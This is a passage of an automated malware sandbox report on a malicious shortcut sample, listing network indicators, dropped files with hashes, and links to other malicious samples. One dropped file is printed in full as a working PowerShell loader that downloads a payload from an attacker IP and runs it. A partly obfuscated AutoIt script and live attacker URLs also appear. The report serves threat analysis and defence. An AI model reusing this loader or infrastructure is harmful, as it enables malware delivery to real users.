                                                          • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
                                                          • Execution Graph export aborted for target mshta.exe, PID 4412 because there are no executed function
                                                          • Execution Graph export aborted for target powershell.exe, PID 1260 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 4484 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: R8CAg00Db8.lnk

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          15:00:13API Interceptor2x Sleep call for process: svchost.exe modified
                                                          15:00:13API Interceptor1x Sleep call for process: mshta.exe modified
                                                          15:00:14API Interceptor110x Sleep call for process: powershell.exe modified
                                                          15:00:29API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                          15:01:15API Interceptor1631x Sleep call for process: Guard.exe modified
                                                          15:01:36API Interceptor468x Sleep call for process: SwiftWrite.pif modified
                                                          20:00:42AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          139.99.188.124s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                          • 139.99.188.124/EsgMle.txt
                                                          EO3RT0fEfb.exeGet hashmaliciousUnknownBrowse
                                                          • 139.99.188.124/ucZfzm.txt
                                                          RMBOriPHVJ.exeGet hashmaliciousUnknownBrowse
                                                          • 139.99.188.124/mzmLv.txt
                                                          S6x3K8vzCA.exeGet hashmaliciousUnknownBrowse
                                                          • 139.99.188.124/wPBPjuY.txt
                                                          PPbimZI4LV.exeGet hashmaliciousUnknownBrowse
                                                          • 139.99.188.124/BlQMSgJx.txt
                                                          l5VhEpwzJy.exeGet hashmaliciousUnknownBrowse
                                                          • 139.99.188.124/jiJNz.txt
                                                          duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                          • 139.99.188.124/QWCheljD.txt
                                                          pt8GJiNZDT.exeGet hashmaliciousUnknownBrowse
                                                          • 139.99.188.124/QWCheljD.txt
                                                          FwR7as4xUq.exeGet hashmaliciousUnknownBrowse
                                                          • 139.99.188.124/EPDjSfs.txt
                                                          147.45.49.155s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                          • tiffany-careers.com/BFmcYQ.exe
                                                          duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                          • tiffany-careers.com/PefjSkkhb.exe

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          tiffany-careers.coms4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                          • 147.45.49.155
                                                          duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                          • 147.45.49.155
                                                          bg.microsoft.map.fastly.netA file has been sent to you via DROPBOX.pdfGet hashmaliciousUnknownBrowse
                                                          • 199.232.210.172
                                                          PyIsvSahWy.exeGet hashmaliciousUnknownBrowse
                                                          • 199.232.210.172
                                                          PkContent.exeGet hashmaliciousUnknownBrowse
                                                          • 199.232.210.172
                                                          https://launch.app/plainsartGet hashmaliciousHTMLPhisherBrowse
                                                          • 199.232.214.172
                                                          ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                                          • 199.232.210.172
                                                          Order_948575494759.xlsGet hashmaliciousUnknownBrowse
                                                          • 199.232.214.172
                                                          DocuStream_Scan_l8obgs3v.pdfGet hashmaliciousHTMLPhisherBrowse
                                                          • 199.232.214.172
                                                          stail.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 199.232.214.172
                                                          22TxDBB1.batGet hashmaliciousUnknownBrowse
                                                          • 199.232.214.172
                                                          sxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
                                                          • 199.232.210.172

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          FREE-NET-ASFREEnetEUs4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                          • 147.45.49.155
                                                          boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                          • 147.45.124.54
                                                          boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                                          • 147.45.124.54
                                                          boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                          • 147.45.124.54
                                                          boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                          • 147.45.124.54
                                                          boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                          • 147.45.124.54
                                                          boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                          • 147.45.124.54
                                                          boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                          • 147.45.124.54
                                                          boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                          • 147.45.124.54
                                                          boatnet.x86.elfGet hashmaliciousMiraiBrowse
                                                          • 147.45.124.54
                                                          OVHFRs4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                          • 139.99.188.124
                                                          https://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpegGet hashmaliciousHTMLPhisherBrowse
                                                          • 51.68.39.188
                                                          la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                          • 176.31.190.89
                                                          la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                          • 51.195.114.88
                                                          la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                          • 139.99.189.235
                                                          https://cc.naver.com/cc?a=pst.link&m=1&nsc=Mblog.post&u=https://prestamosgarantizados.com/vvr/#phg4Plg4Ppjx3vandLh6rWPyLh6rwLh6q07qvz9Bjx3z9BR15WPyGet hashmaliciousHTMLPhisherBrowse
                                                          • 167.114.27.228
                                                          http://bluepeak-group.com/fcGet hashmaliciousUnknownBrowse
                                                          • 54.38.113.2
                                                          yoyf.exeGet hashmaliciousUnknownBrowse
                                                          • 91.134.10.127
                                                          yoyf.exeGet hashmaliciousUnknownBrowse
                                                          • 91.134.10.182
                                                          Lu4421.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                          • 51.89.44.68

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          37f463bf4616ecd445d4a1937da06e19s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                          • 147.45.49.155
                                                          sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                                          • 147.45.49.155
                                                          solara-executor.exeGet hashmaliciousUnknownBrowse
                                                          • 147.45.49.155
                                                          List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                          • 147.45.49.155
                                                          g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                          • 147.45.49.155
                                                          solara-executor.exeGet hashmaliciousUnknownBrowse
                                                          • 147.45.49.155
                                                          Setup.msiGet hashmaliciousUnknownBrowse
                                                          • 147.45.49.155
                                                          InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                          • 147.45.49.155
                                                          T2dvU8f2xg.exeGet hashmaliciousUnknownBrowse
                                                          • 147.45.49.155

                                                          Dropped Files

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\Users\Public\Guard.exes4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                            PkContent.exeGet hashmaliciousUnknownBrowse
                                                              PkContent.exeGet hashmaliciousUnknownBrowse
                                                                ldqj18tn.exeGet hashmaliciousUnknownBrowse
                                                                  ldqj18tn.exeGet hashmaliciousUnknownBrowse
                                                                    EO3RT0fEfb.exeGet hashmaliciousUnknownBrowse
                                                                      RMBOriPHVJ.exeGet hashmaliciousUnknownBrowse
                                                                        S6x3K8vzCA.exeGet hashmaliciousUnknownBrowse
                                                                          PPbimZI4LV.exeGet hashmaliciousUnknownBrowse
                                                                            l5VhEpwzJy.exeGet hashmaliciousUnknownBrowse

                                                                              Created / dropped Files

                                                                              C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1310720
                                                                              Entropy (8bit):1.3073280473701847
                                                                              Encrypted:false
                                                                              SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvri:KooCEYhgYEL0In
                                                                              MD5:345BC692C1B3203C326AC1E122590795
                                                                              SHA1:2BACC3FE6B8CD54955EA9FC2316F4C6C812CF23E
                                                                              SHA-256:07CEE50F7A06209CC52BAFCC5FF615102A809F204CD99262128E2861BD272622
                                                                              SHA-512:498DC03DC2D374757FC13B8AC2F3C277D006F97ACB37F1942365AC242060F79B1CF75FE24FCC77DE77B4FE904CD930F7BD8F82920A8AF0222DFFFB9BC12A8F90
                                                                              Malicious:false
                                                                              Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xc8b94a48, page size 16384, DirtyShutdown, Windows version 10.0
                                                                              Category:dropped
                                                                              Size (bytes):1310720
                                                                              Entropy (8bit):0.42210846074852404
                                                                              Encrypted:false
                                                                              SSDEEP:1536:5SB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:5aza/vMUM2Uvz7DO
                                                                              MD5:98DD50424C953A3874AD6A0B037A1D7C
                                                                              SHA1:8F0A67B933FA856A0E4DD6C0BA34459A881B8028
                                                                              SHA-256:10D08956DB91BE03F99473E00D544C58935824170B31736A45613190423D99A4
                                                                              SHA-512:33B3E3B6DBB2A1978337A960BF9FE11334DDEDF56CCD7618DE8EE3ABAA0FECFC16E5D64B34D5A1C642372ADC0E8F5CF9C1ACE31ED402001549716FA5AC41AD90
                                                                              Malicious:false
                                                                              Preview:.JH... .......A.......X\...;...{......................0.!..........{A......|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................>L......|..................GAk......|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):16384
                                                                              Entropy (8bit):0.07498031055550482
                                                                              Encrypted:false
                                                                              SSDEEP:3:MW8YefO7ajn13a/ROXAllcVO/lnlZMxZNQl:MdzfO7a53qkXAOewk
                                                                              MD5:6417490B9A872B6A120E7133469919D2
                                                                              SHA1:F478984220FC4D180F15EF3E8DE6738E3DD1FCD0
                                                                              SHA-256:A4550F40BD12DFA22FB5864759AA1A6F0784544073447318077129EEA0A19F4D
                                                                              SHA-512:D1056F85D69A2EC6A99E69FEDA404C1E908A044C76A266595C781416D53E6D7A351E743459609A2E9AB8448B2261EE9FD27C16D65DB32C344A94821CD6D9D191
                                                                              Malicious:false
                                                                              Preview:t........................................;...{.......|.......{A..............{A......{A..........{A]................GAk......|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\Public\Guard.exe

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):893608
                                                                              Entropy (8bit):6.62028134425878
                                                                              Encrypted:false
                                                                              SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                              MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                              SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                              SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                              SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                              Joe Sandbox View:
                                                                              • Filename: s4PymYGgSh.lnk, Detection: malicious, Browse
                                                                              • Filename: PkContent.exe, Detection: malicious, Browse
                                                                              • Filename: PkContent.exe, Detection: malicious, Browse
                                                                              • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                                              • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                                              • Filename: EO3RT0fEfb.exe, Detection: malicious, Browse
                                                                              • Filename: RMBOriPHVJ.exe, Detection: malicious, Browse
                                                                              • Filename: S6x3K8vzCA.exe, Detection: malicious, Browse
                                                                              • Filename: PPbimZI4LV.exe, Detection: malicious, Browse
                                                                              • Filename: l5VhEpwzJy.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                              C:\Users\Public\PublicProfile.ps1

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\PefjSkkhb.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):486
                                                                              Entropy (8bit):5.264402695461477
                                                                              Encrypted:false
                                                                              SSDEEP:12:f73/oomFEoFnV/9LBzFj0zUQbnRS6SxJMnCPTFM:f73/UCknZ9LzjYnRSb8Cba
                                                                              MD5:AA25D3FDAD1F106B38D0FC6EF7812219
                                                                              SHA1:1811C03BBAD3B7ED95835D4CC6D43C664C1B4A5B
                                                                              SHA-256:6CC303DD32C6F3629ACD59CFB6219D30D504AC12BBA0AFD87F38012E211496E0
                                                                              SHA-512:ED1809238957DAF71ADB4F3D0996D9CD51431AC0FB04180F4FEB5A4FE51CF07F95F935D8F56863B019AFAB737E03BE5E2E687FEB8C0416F4E470E40A282EC566
                                                                              Malicious:true
                                                                              Preview:[string]$fU5L = "http://139.99.188.124/QWCheljD.txt"..[string]$oF6L = "C:\Users\Public\Secure.au3"..[string]$exePath = "C:\Users\Public\Guard.exe"....# Download the content from the URL..$wResp = New-Object System.Net.WebClient..$fCont = $wResp.DownloadString($fU5L)....# Save the downloaded content to the output file..Set-Content -Path $oF6L -Value $fCont -Encoding UTF8....# Run the executable with the output file as an argument..Start-Process -FilePath $exePath -ArgumentList $oF6L

                                                                              C:\Users\Public\Secure.au3

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1266)
                                                                              Category:dropped
                                                                              Size (bytes):1240103
                                                                              Entropy (8bit):5.144317310151777
                                                                              Encrypted:false
                                                                              SSDEEP:12288:28V+jcfSgyuH7Kixj+UXk8pL6OvsEmeXBWD4LkPq0e718m3UDd:qcB7HxicaEmEQD3I1jUZ
                                                                              MD5:5FD6DCD6015C6F3F00D18BE2CE75691F
                                                                              SHA1:63007CCA9ED6C2A903AA30B6FA00EB280D4879A2
                                                                              SHA-256:044C72C01C72338F3559D098BEBF9D251F911B9FF41DD958EB80D8F7C9583C31
                                                                              SHA-512:29DFDE6DBE2BDA1F6FBC7FACD06B9F66BED01BC5C01ECEFC6C35DE0A49D905869ADFFBC89B9934650CC6D28C3F0377FC6BE4CE25F92D54646A909DFAD7282219
                                                                              Malicious:true
                                                                              Preview:.Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]

                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):292
                                                                              Entropy (8bit):5.19566503652455
                                                                              Encrypted:false
                                                                              SSDEEP:6:7PQcEdSQ+q2Pwkn2nKuAl9OmbnIFUt8OPQcwgZmw+OPQcwQVkwOwkn2nKuAl9Omt:7oc0OvYfHAahFUt8OocZ/+Oocz5JfHAR
                                                                              MD5:A77AFB1B3C67D5238862985000C44D4A
                                                                              SHA1:0234888CCAD223F43D7DCDDCA594BD42EA7705F1
                                                                              SHA-256:5E833A3756FAE064B03A3571F4011B5FF4DA0E2A884409155EE6CC57F1870E4C
                                                                              SHA-512:099AEAEF7C40A9B500AA4AC787212D018E64F2F2B72E9A3C0083B386072A532C331A451F77E9E97B69F49D7E8ED89328E1C47E0BCCC35A121B586F0F5AA6AEFC
                                                                              Malicious:false
                                                                              Preview:2024/12/18-15:00:18.570 1d08 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/18-15:00:18.573 1d08 Recovering log #3.2024/12/18-15:00:18.573 1d08 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):292
                                                                              Entropy (8bit):5.19566503652455
                                                                              Encrypted:false
                                                                              SSDEEP:6:7PQcEdSQ+q2Pwkn2nKuAl9OmbnIFUt8OPQcwgZmw+OPQcwQVkwOwkn2nKuAl9Omt:7oc0OvYfHAahFUt8OocZ/+Oocz5JfHAR
                                                                              MD5:A77AFB1B3C67D5238862985000C44D4A
                                                                              SHA1:0234888CCAD223F43D7DCDDCA594BD42EA7705F1
                                                                              SHA-256:5E833A3756FAE064B03A3571F4011B5FF4DA0E2A884409155EE6CC57F1870E4C
                                                                              SHA-512:099AEAEF7C40A9B500AA4AC787212D018E64F2F2B72E9A3C0083B386072A532C331A451F77E9E97B69F49D7E8ED89328E1C47E0BCCC35A121B586F0F5AA6AEFC
                                                                              Malicious:false
                                                                              Preview:2024/12/18-15:00:18.570 1d08 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/18-15:00:18.573 1d08 Recovering log #3.2024/12/18-15:00:18.573 1d08 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):336
                                                                              Entropy (8bit):5.197935109573059
                                                                              Encrypted:false
                                                                              SSDEEP:6:7PQcY+q2Pwkn2nKuAl9Ombzo2jMGIFUt8OPQcHZmw+OPQcnVkwOwkn2nKuAl9OmT:7octvYfHAa8uFUt8OocH/+OocV5JfHAv
                                                                              MD5:769329A20F8B6A291227EBCC35EE458C
                                                                              SHA1:CFF64F0AD3598FEF6156ABD4C6534EA74659CA9E
                                                                              SHA-256:64BA4D32C7229EC0E30F9AC4955DE342DE3836BAEA050C4CFE6C0E4E67FA1A2C
                                                                              SHA-512:0C23C932A0101ED329600992C8A9021DF34B1A60A10D3932E1D4484184E92A4F7AC594C5DB12D3B06964FE96D08CD2525BE823629E8E7BB08D738FFC3248863A
                                                                              Malicious:false
                                                                              Preview:2024/12/18-15:00:18.706 1d98 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/18-15:00:18.710 1d98 Recovering log #3.2024/12/18-15:00:18.710 1d98 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):336
                                                                              Entropy (8bit):5.197935109573059
                                                                              Encrypted:false
                                                                              SSDEEP:6:7PQcY+q2Pwkn2nKuAl9Ombzo2jMGIFUt8OPQcHZmw+OPQcnVkwOwkn2nKuAl9OmT:7octvYfHAa8uFUt8OocH/+OocV5JfHAv
                                                                              MD5:769329A20F8B6A291227EBCC35EE458C
                                                                              SHA1:CFF64F0AD3598FEF6156ABD4C6534EA74659CA9E
                                                                              SHA-256:64BA4D32C7229EC0E30F9AC4955DE342DE3836BAEA050C4CFE6C0E4E67FA1A2C
                                                                              SHA-512:0C23C932A0101ED329600992C8A9021DF34B1A60A10D3932E1D4484184E92A4F7AC594C5DB12D3B06964FE96D08CD2525BE823629E8E7BB08D738FFC3248863A
                                                                              Malicious:false
                                                                              Preview:2024/12/18-15:00:18.706 1d98 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/18-15:00:18.710 1d98 Recovering log #3.2024/12/18-15:00:18.710 1d98 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\0a9ea409-a18c-44fe-a300-79b9964ae6bb.tmp

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):475
                                                                              Entropy (8bit):4.967403857886107
                                                                              Encrypted:false
                                                                              SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                                              MD5:B7761633048D74E3C02F61AD04E00147
                                                                              SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                                              SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                                              SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                                              Malicious:false
                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):475
                                                                              Entropy (8bit):4.967403857886107
                                                                              Encrypted:false
                                                                              SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                                              MD5:B7761633048D74E3C02F61AD04E00147
                                                                              SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                                              SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                                              SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                                              Malicious:false
                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF3c2547.TMP (copy)

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):475
                                                                              Entropy (8bit):4.967403857886107
                                                                              Encrypted:false
                                                                              SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                                              MD5:B7761633048D74E3C02F61AD04E00147
                                                                              SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                                              SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                                              SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                                              Malicious:false
                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\b17fa724-05db-442f-87a6-2434c6678027.tmp

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:JSON data
                                                                              Category:modified
                                                                              Size (bytes):475
                                                                              Entropy (8bit):4.9729052853641855
                                                                              Encrypted:false
                                                                              SSDEEP:12:YH/um3RA8sqAtsBdOg2H9OCcaq3QYiubInP7E4TX:Y2sRdspOdMHwN3QYhbG7n7
